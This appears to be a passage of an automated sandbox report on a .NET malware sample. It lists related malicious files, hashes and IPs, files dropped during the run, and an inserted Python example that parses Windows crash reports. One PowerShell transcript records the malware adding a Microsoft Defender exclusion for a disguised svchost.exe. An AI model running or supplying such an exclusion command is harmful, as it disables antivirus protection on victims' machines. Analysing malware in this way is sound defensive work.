                                                    54328bd36c14bd82ddaa0c04b25ed9ad | DHLdocument11022020680908911.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | 20200804-8293847pdf.scr.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | 234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | SKMC25832100083932157.jar | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | EMPRESA SUMPEX TRADE.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | Yeni siparis _WJO-001, pdf.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | Dringende RFQ_AP75887658_98788,pdf.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | MUYR09080.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                    Process: C:\Windows\System32\svchost.exe
                                                    File Type: data
                                                    Category: dropped
                                                    Size (bytes): 4096
                                                    Entropy (8bit): 0.5976804353698416
                                                    Encrypted: false
                                                    SSDEEP: 6:bWlEk1GaD0JOCEfMuaaD0JOCEfMKQmDtAl/gz2cE0fMbhEZolrRSQ2hyYIIT:bWNGaD0JcaaD0JwQQtAg/0bjSQJ
                                                    MD5: 0C2A0FB45AE1576A122F5656C2B87E6A
                                                    SHA1: A93AA5CEE6A26BF623A545FC0DF2B9696165BFFA
                                                    SHA-256: 618F67B0C0755100E663919FFA287BCA588F800B638A2857067D393508FED4E3
                                                    SHA-512: AC1D71B8B6DF42B7B63F6CB516338D21EEA2A59B6C9743243AE029A366D1D06C6C4EF48AE9649F8572BC966E4775C771800C2CCFBF08BB87D7B5C9D43511BFD6
                                                    Malicious: false
                                                    Preview: ....E..h..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                    Process: C:\Windows\System32\svchost.exe
                                                    File Type: Extensible storage engine DataBase, version 0x620, checksum 0xdc05173d, page size 16384, DirtyShutdown, Windows version 10.0
                                                    Category: dropped
                                                    Size (bytes): 32768
                                                    Entropy (8bit): 0.09541840300770618
                                                    Encrypted: false
                                                    SSDEEP: 6:RXzwl/+0XRIE11Y8TRXdyV6K7Xzwl/+0XRIE11Y8TRXdyV6K:50+0XO4bldzKL0+0XO4bldzK
                                                    MD5: AA689052BE348C1ECC66B5E639E3234B
                                                    SHA1: B9A6C6D0487A8165757361CDDC10811B65E8DE42
                                                    SHA-256: 25E1EA5E8E0F2468C89C39700FDAD0F8C204447B5B18D9B51D14049B4C22231F
                                                    SHA-512: 48BA3314A159441D4058A3BDEC38D70A0178A036D04127A4726A2A04AF7099DCC77CD79349BE0188E0EF7C20D287F27AD67B9C52C46F5D68958D2E1073D72B16
                                                    Malicious: false
                                                    Preview: ...=... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................{.....y.e................!........y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                    Process: C:\Windows\System32\svchost.exe
                                                    File Type: data
                                                    Category: dropped
                                                    Size (bytes): 8192
                                                    Entropy (8bit): 0.1108664572894607
                                                    Encrypted: false
                                                    SSDEEP: 3:JllTEvg3QUAl/bJdAtiVhVloll:xag3XAt4g2
                                                    MD5: 52FA11AC12F2144CC9C1D312B9B48211
                                                    SHA1: 3E9586A500E74302E80B17EE0F43721BC57440C9
                                                    SHA-256: CCC3477C544B4A63479742AE688F25935EB4661AB7E56E16781EC03482F66AA2
                                                    SHA-512: 1A31B93FE26B4ECA6E389C1B1114B2732ACC27B3E18506A7C03EAF7CAA75F4FAC0048D113BAA092B305080424D7DB89552228B4D069E9BA8C74EA7C598566A01
                                                    Malicious: false
                                                    Preview: .Lt......................................3...w.......y.......w...............w.......w....:O.....w..................!........y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_lfQuSBwdSf.exe_dbcf35fab953bf6b1a979b91e3aa6f6e971ce7_957fde8e_1840eb32\Report.wer
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):17404
                                                    Entropy (8bit):3.7598066063700224
                                                    Encrypted:false
                                                    SSDEEP:192:hZGB8e4mHBUZMXSaKQqueZitu/u7sQS274Itbx:O2eZBUZMXSaFmJ/u7sQX4Itbx
                                                    MD5:79641D2E96E5F7DC6F51501B97E9CAAB
                                                    SHA1:94CB1967BA3F74A848D81E33BC9A4EC849CD39A8
                                                    SHA-256:CC51A3F9523D499F82ECEE27807107A7C707AF1E08C7FAC8C134760B130AEAE1
                                                    SHA-512:CA78672F7C42C83E8CC208CBF7579689D26700C9B27C8D5B249DF1E2D408B471AF39B9DA9A62D555AF7B37432A681A335ED8DA6242D24435E27DD8D0B0A4FB7C
                                                    Malicious:true
                                                    Preview (UTF-16LE text, decoded; the raw preview renders each null byte as a dot and is truncated): Version=1 | EventType=CLR20r3 | EventTime=132623785467132203 | ReportType=2 | Consent=1 | UploadTime=132623785551038269 | ReportStatus=268435456 | ReportIdentifier=a61cbd30-7ec3-4bf5-bbc4-f8edabcf9cf6 | IntegratorReportIdentifier=04dfcb03-b3ac-407e-84b8-647e631c0ef4 | Wow64Host=34404 | Wow64Guest=332 | NsAppName=lfQuSBwdSf.exe | OriginalFilename=Dimbono.exe | AppSessionGuid=00000ae4-0001-0017-fcfc-453ba12cd701 | TargetAppId=W:000644905294daf239dd6142d109e1cd01fb00000000!0000f8edbbed8318311f070167c73fcca9f63f (truncated)
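The Report.wer shown above is plain UTF-16LE key=value text, so it can be parsed without any Windows tooling, and it carries facts the rest of the report only implies: the sample's internal name (OriginalFilename=Dimbono.exe) differs from the name it ran under, EventType CLR20r3 is WER's event type for an unhandled .NET exception, Wow64Guest/Wow64Host are the PE machine values 0x14C/0x8664 (a 32-bit image on 64-bit Windows, matching the SysWOW64 WerFault.exe that wrote the file), and the hex after "!0000" in TargetAppId is a prefix of the sample's SHA-1. The following Python is an added example, not code from the sandbox or from this report, that decodes such a file and derives those facts. SAMPLE_REPORT_WER is constructed from the decoded preview and stops where the preview stops, so its TargetAppId is truncated; SAMPLE_SHA1 is the hash from the General Information section. The FILETIME conversion puts the crash at 2021-04-08 18:02:26 UTC, four seconds before the timestamp in the minidump header listed below it.

```python
"""Parse a Windows Error Reporting Report.wer (UTF-16LE key=value text) and
extract what matters when a malware sample crashes under analysis.

Added example; not code from the sandbox report. SAMPLE_REPORT_WER is
constructed from the decoded Report.wer preview and ends where the preview
ends, so its TargetAppId value is truncated. Real files continue with
Sig[n]/DynamicSig entries and the loaded-module list."""
import re
from datetime import datetime, timedelta, timezone
from typing import Dict

# SHA-1 of lfQuSBwdSf.exe from the report's General Information section.
SAMPLE_SHA1 = "f8edbbed8318311f070167c73fcca9f63f79c905"

# PE machine types as they appear (in decimal) in Wow64Host / Wow64Guest.
IMAGE_FILE_MACHINE_I386 = 0x14C    # 332
IMAGE_FILE_MACHINE_AMD64 = 0x8664  # 34404

SAMPLE_REPORT_WER = (
    "\ufeff"  # WerFault.exe writes a UTF-16LE BOM first
    "Version=1\r\n"
    "EventType=CLR20r3\r\n"
    "EventTime=132623785467132203\r\n"
    "ReportType=2\r\n"
    "Consent=1\r\n"
    "UploadTime=132623785551038269\r\n"
    "ReportStatus=268435456\r\n"
    "ReportIdentifier=a61cbd30-7ec3-4bf5-bbc4-f8edabcf9cf6\r\n"
    "IntegratorReportIdentifier=04dfcb03-b3ac-407e-84b8-647e631c0ef4\r\n"
    "Wow64Host=34404\r\n"
    "Wow64Guest=332\r\n"
    "NsAppName=lfQuSBwdSf.exe\r\n"
    "OriginalFilename=Dimbono.exe\r\n"
    "AppSessionGuid=00000ae4-0001-0017-fcfc-453ba12cd701\r\n"
    # Cut off at the same point as the preview on the page.
    "TargetAppId=W:000644905294daf239dd6142d109e1cd01fb00000000"
    "!0000f8edbbed8318311f070167c73fcca9f63f\r\n"
).encode("utf-16-le")

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
APPID_SHA1_RE = re.compile(r"!0000([0-9a-fA-F]{8,40})")


def parse_report_wer(data: bytes) -> Dict[str, str]:
    """Decode the UTF-16LE text and split each line at its first '='."""
    text = data.decode("utf-16-le").lstrip("\ufeff")
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        if "=" not in line:
            continue  # blank lines between sections
        key, value = line.split("=", 1)
        fields[key.strip()] = value.strip()
    return fields


def filetime_to_utc(filetime: int) -> datetime:
    """FILETIME is 100 ns ticks since 1601-01-01 UTC; timedelta takes microseconds."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def triage(fields: Dict[str, str], known_sha1: str) -> Dict[str, object]:
    """Derive the analyst-facing facts from the parsed fields."""
    original = fields.get("OriginalFilename", "")
    on_disk = fields.get("NsAppName", "")
    # In the preview the hex after '!0000' is a prefix of the sample's SHA-1;
    # compare as a prefix because the value may be truncated.
    match = APPID_SHA1_RE.search(fields.get("TargetAppId", ""))
    sha1_prefix_ok = match is not None and known_sha1.lower().startswith(match.group(1).lower())
    return {
        "renamed": bool(original) and original.lower() != on_disk.lower(),
        "original_filename": original,
        "managed_crash": fields.get("EventType") == "CLR20r3",  # unhandled .NET exception
        "wow64_guest": (fields.get("Wow64Guest") == str(IMAGE_FILE_MACHINE_I386)
                        and fields.get("Wow64Host") == str(IMAGE_FILE_MACHINE_AMD64)),
        "crash_time_utc": filetime_to_utc(int(fields["EventTime"])).strftime("%Y-%m-%d %H:%M:%S"),
        "sha1_prefix_matches": sha1_prefix_ok,
    }


if __name__ == "__main__":
    parsed = parse_report_wer(SAMPLE_REPORT_WER)
    for key, value in triage(parsed, SAMPLE_SHA1).items():
        print(f"{key:>20}: {value}")
```

Point `parse_report_wer` at a real Report.wer read in binary mode; the same splitting works for the Sig[n].Name/Value lines that follow the header, which is where the faulting module and offset live when the crash is worth reproducing.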
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE46.tmp.dmp
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Thu Apr 8 18:02:30 2021, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):330441
                                                    Entropy (8bit):3.629346303572354
                                                    Encrypted:false
                                                    SSDEEP:3072:DNa2o3eyzFdhx0nAyjd+pOD0QRUCgUeAw/9gIOgF59jVjZpXe:dQP0epW7Tj1k9RpD95jZle
                                                    MD5:F80E8E853AC993B123EF2D189BC5D4A6
                                                    SHA1:8C57934C587DBFBAA1236F1BF655CEB989EAB236
                                                    SHA-256:5133BE65AFA86EB1B4F7906A86C113E06ECD13F42A839616DB99F290A5D6EB0C
                                                    SHA-512:DA3BBCC9061439054BD4599DA2F56CADA8EA063B7296AC55D6158BCAB21BA18A5EF9A4C7CA9FC93168CCBBBE248C9039A9005A654F7D9752E5F43498A6835E29
                                                    Malicious:false
                                                    Preview (minidump, binary; the raw preview renders non-printable bytes as dots. Printable strings recoverable from the header): MDMP signature, GenuineIntel, Pacific Standard Time, Pacific Daylight Time, 17134.1.x86fre.rs4_release.180410-1804, dbgcore.i386,10.0.17134.1 (truncated)
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD903.tmp.WERInternalMetadata.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8408
                                                    Entropy (8bit):3.69539172946485
                                                    Encrypted:false
                                                    SSDEEP:192:Rrl7r3GLNiNB6K6YSKSUi6I3WegmfZOSUCprY89bTnEsf0zxm:RrlsNir6K6YPSUi6OWegmfcSpTn3fB
                                                    MD5:0E16BAA073DA35DADE06031DE91DBB5E
                                                    SHA1:27E52AD81E964E9EB4ECACE5528058776D7B9AF2
                                                    SHA-256:D1F5C3BF879527D91027766168562B2E854AA6BF429B321A127A44916B30655C
                                                    SHA-512:1205B8CA1F29160F6ED376E0CC13AED8037A91351E3846456074C45D758F640860CD7F36D76893501D23B34F3E2E1CA26FA941A5EA19CD9B72DF4BE139D6F512
                                                    Malicious:false
                                                    Preview (UTF-16LE XML, decoded; the raw preview renders each null byte as a dot and is truncated): <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>2788</Pid> (truncated)
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB94.tmp.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4750
                                                    Entropy (8bit):4.474044588371349
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwSD8zsJJgtWI9+Ay6WSC8BL8fm8M4J4FF037+q8vvrJEnJbCrcdd:uITfbYSSNeJz7KzJEnJGrcdd
                                                    MD5:3E5B568551BEFAFC35E627281F8CDE65
                                                    SHA1:CB3622DD78CB6F7F6C7CEA47F0DA87474D49E4B5
                                                    SHA-256:C08106AF77EA9D1D5FB81C525BB443F9FA1C442D76381FAB26966B28217C57AD
                                                    SHA-512:708FABFA888069A6F584666011EF9E2131A67FE902B53B2F42D92839BFD41842023434B26DA5EAD019C65B3818A94D82B8748BD4389F18E08BB363B04A3B067B
                                                    Malicious:false
                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937633" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):698
                                                    Entropy (8bit):5.049094101509586
                                                    Encrypted:false
                                                    SSDEEP:12:reVGyMYx2Y5BYtmWNUc5AtYX5E4a2KryMYGH+ptsxptsOtw9O9S8:reUyMGF5ytmLcetYX5E2KryMb+zsxzsk
                                                    MD5:B0CEEA53B3467F59FD8E87F80213BDE9
                                                    SHA1:D9E6D1CBB480E7248658DF935648DFA733745602
                                                    SHA-256:D9C93CB64E6F1F5BDC94581CEEA99F759EE1E35716EAF623C61962EA0152F9DD
                                                    SHA-512:DDAA6C9FA3535B4926C60B692F8E202D10EB160D1F8BE7A9DE79239EF75AFD470403DF1D8F0CBF29A5F819E907D02E8E656BB9A52E71E30D9259987EAE881655
                                                    Malicious:false
                                                    Preview: PSMODULECACHE......w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........D..8.......C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1........Get-OperationValidation........Invoke-OperationValidation........
                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.11021535299334234
                                                    Encrypted:false
                                                    SSDEEP:12:26fEzXm/Ey6q9995cwuNq3qQ10nMCldimE8eawHjcIEv:26fBl689ugLyMCldzE9BHjcIE
                                                    MD5:D8F8828F046E214C4F83197D79308E4E
                                                    SHA1:0CE8ABF0F299AFA77651703664850B30F7205FF9
                                                    SHA-256:298F7C2C58A35D3F9018C168A05CAB802CB908A32B5FE47325F050AD8222121C
                                                    SHA-512:C263EE316960DC044520C7475A035D9E6F5BCE3064C025834AE468270C40C0A9CAB80905FA9A2C961AF55B5DAB1A47BB73A4F0EA6DEAF086DEA6D46C96908D65
                                                    Malicious:false
                                                    Preview (ETL trace header, binary; the raw preview renders non-printable bytes as dots. Printable UTF-16 strings recoverable): @tzres.dll,-212, @tzres.dll,-211, SyncVerbose, C:\Users\hardz\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl (truncated)
                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.11234695267431766
                                                    Encrypted:false
                                                    SSDEEP:12:BzXm/Ey6q9995cktL1miM3qQ10nMCldimE8eawHza1miIuf:Ml68X1tMLyMCldzE9BHza1tIO
                                                    MD5:25C45E2E80B645291BE51ED449ADF375
                                                    SHA1:54C9935A5125550F947D32BF83AE7A5EFA57E0B8
                                                    SHA-256:C5BFCFB1A1C6F430C88F820EBCD0B5DFEB66E1D504357C40BE1F11CCBA00ED0E
                                                    SHA-512:E6CDC84A6D4AEFF20DD6E35D7EC45B3AA84E8BF310DD6B59F4F1FBD08A85AB71B355E2AD8AC6FF92AA7F041E2D2A7C4894B18A07ACCFE179D82D6DFA4DDF49C9
                                                    Malicious:false
                                                    Preview (ETL trace header, binary; the raw preview renders non-printable bytes as dots. Printable UTF-16 strings recoverable): @tzres.dll,-212, @tzres.dll,-211, UnistackCircular, C:\Users\hardz\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl (truncated)
                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.11247201638927183
                                                    Encrypted:false
                                                    SSDEEP:12:kzXm/Ey6q9995c7x1mK2P3qQ10nMCldimE8eawHza1mKmf:hl68k1iPLyMCldzE9BHza1a
                                                    MD5:B4833118DA36CBF8E6082C02364BBB4F
                                                    SHA1:D5F49A356B1A273FA41B354F22F1642C726DA33C
                                                    SHA-256:40F0F8C311F41D76B4599B105405CF2F7FA54A0D767DB3E5A43B0EEC2DDF66EC
                                                    SHA-512:521010B548704EEDB1360549075BD5FBC7F2D7D725A1C632375BBB46FB731D25753242BF981EF48AC5BE32B93CDABD63AC2B4B1ADBBB655AB06952FF67B87366
                                                    Malicious:false
                                                    Preview (ETL trace header, binary; the raw preview renders non-printable bytes as dots. Printable UTF-16 strings recoverable): @tzres.dll,-212, @tzres.dll,-211, UnistackCritical, C:\Users\hardz\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl (truncated)
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3unvo0at.i2z.psm1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afdwa5sz.ycm.ps1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bk34zenz.mnc.psm1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cv5sw5e3.x0i.psm1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkeuwky5.kyp.ps1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wacrv0pl.app.ps1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.216554.+ytC9MFS.20210408110204.txt
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):862
                                                    Entropy (8bit):5.356189201456313
                                                    Encrypted:false
                                                    SSDEEP:24:BxSA33yxvBndx2DOXUWeSuMG1OWbHjeTKKjX4CIym1ZJXDFuMG1C:BZuvhdoO+SqPbqDYB1Z3qg
                                                    MD5:BCF1AA333B0E2685377E4D638341B518
                                                    SHA1:D2D2DF3F261EBEDE89E39314B34FB153915B9A1F
                                                    SHA-256:E69620958827E1C5ADABAB8EEBBE18350B0316BEFE2CE4852F496756E0B7F086
                                                    SHA-512:E06DFFB20671B0DDB6AAAD522CF1BA442D7EA59334A235EDCE4C42E47E8F59FC7F9754FF0BA5DA2D9C6EEC58FCA81D60B13174E13B9DF6C8186D977786DB0A38
                                                    Malicious:false
                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408110234..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe -Force..Process ID: 1000..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408110235..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe -Force..
                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.216554.6CUcdU4H.20210408110202.txt
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):843
                                                    Entropy (8bit):5.329898122050224
                                                    Encrypted:false
                                                    SSDEEP:24:BxSAGxvBndx2DOXUWeSuWW9HjeTKKjX4CIym1ZJXVu6:BZyvhdoO+SI9qDYB1ZrR
                                                    MD5:67C14436066F55A5F8035E0A8785E196
                                                    SHA1:29F44AD56CD4E5515590510E3F20F3B71A73A2A2
                                                    SHA-256:F5782A22B43FA86B0F2FE3AE18747CD303B4FCE8EC9B9405993BF4F7270EA14A
                                                    SHA-512:567D1876B4FD16D28DDC5A820C28E08C56D6469DA5CB684F3D0BEFAE757D67940CF8791157DCA03B60F203C733E0D9DF21FDB4340386E13EFD149B422DEFC2D5
                                                    Malicious:false
